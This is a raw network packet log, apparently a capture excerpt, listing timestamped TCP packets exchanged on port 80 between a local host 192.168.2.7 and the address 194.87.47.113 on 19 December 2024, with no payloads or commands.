Dec 19, 2024 08:47:35.002371073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.002743959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.002810001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.006134033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.006294966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.006443977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.006614923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.006977081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.007111073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.007309914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.007678986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.007795095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.008066893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.008363962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.008434057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.008905888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.009073973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.009155989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.009721041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.009884119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.010054111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.010451078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.010608912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.010685921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.010976076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.011137009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.011199951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.011754990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.011910915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.011986971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.012531042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.012712002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.012844086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.013298988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.013557911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.013624907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.013802052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.014420033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.014489889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.014561892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.015152931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.015242100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.015347958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.015929937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.015974045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.016127110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.016736984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.016870975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.016916990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.017524004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.017573118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.017709970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.018379927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.018435955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.018502951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.019232988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.019277096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.019433022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.019906998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.019953966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.020204067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.020756960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.020853996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.021075964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.021486998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.021545887 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.021676064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.022262096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.022305012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.022461891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.023076057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.023168087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.023238897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.023874998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.023945093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.024036884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.024734974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.024813890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.024853945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.025433064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.025516033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.025640965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.026257992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.026443958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.026521921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.027023077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.027210951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.027235031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.027812004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.027880907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.028037071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.029526949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.029532909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.029687881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.030284882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.030297995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.030333042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.030992031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.030998945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.031056881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.031764984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.031773090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.031845093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.032440901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.032541037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.032710075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.033035040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.033041954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.033085108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.033744097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.033797026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.034064054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.034467936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.034538031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.034770012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.035166979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.035217047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.035448074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.035808086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.035928011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.036163092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.036531925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.036664963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.036909103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.037421942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.037482977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.037518024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.038206100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.038264036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.038300991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.038914919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.039040089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.039123058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.039731979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.039777994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.039943933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.040673971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.040740967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.040894985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.041317940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.041385889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.041547060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.042054892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.042221069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.075757027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.209844112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.210210085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.210302114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.210567951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.210580111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.210635900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.211343050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.211621046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.211695910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.211994886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.212008953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.212069035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.215512037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215522051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215528965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215533972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215548992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215595007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.215631008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215686083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.215703964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.215703964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.219568968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219578981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219584942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219592094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219652891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.219667912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219672918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.219676971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219683886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.219763994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.222228050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222281933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222297907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222307920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222330093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.222378016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.222384930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222395897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222464085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.222791910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222800016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.222847939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.223524094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.223532915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.223579884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.224329948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.224338055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.224432945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.225080013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.225089073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.225188017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.225847006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.225857973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.225914955 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.226641893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.226650953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.226691961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.227402925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.227411985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.227422953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.227461100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.228189945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.228198051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.228245020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.228909969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.228949070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.228974104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.229712963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.229737043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.229821920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.230467081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.230505943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.230525017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.231280088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.231292009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.231298923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.231344938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.232033968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.232043982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.232122898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.232875109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.232883930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.232953072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.235434055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235449076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235457897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235462904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235598087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235600948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.235600948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.235605955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.235778093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.236629963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.236639023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.236669064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.236675978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.236706018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.236706018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.237241030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.237248898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.237313986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.238020897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.238029957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.238097906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.238679886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.238687992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.238756895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.239459038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.239469051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.239537954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.240052938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.240061045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.240134001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.240780115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.240788937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.240873098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.241440058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.241453886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.241513968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.242177010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.242186069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.242224932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.242800951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.243187904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.243251085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.244649887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.244659901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.244740009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.244936943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.245147943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.245156050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.245229006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.246040106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.246088028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.246202946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.246210098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.246253014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.246891022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.246900082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.246984959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.247606993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.247941971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.248003960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.248290062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.248296976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.248353958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.248951912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.249329090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.249399900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.249701023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.249708891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.249788046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.250359058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.250731945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.250777960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.251003981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.294289112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.401652098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.401870012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.401926994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.402134895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.402452946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.402525902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.402795076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.403146982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.403209925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.403604031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.403858900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.403929949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.404314041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.404558897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.404648066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.405148983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.405322075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.405366898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.405872107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.406068087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.406131983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.406676054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.406902075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.407043934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.407490015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.407685041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.407820940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.408313036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.408440113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.408509016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.409121037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.409272909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.409385920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:35.409971952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.410135984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:35.410283089 CET	49707	80	192.168.2.7	194.87.47.113
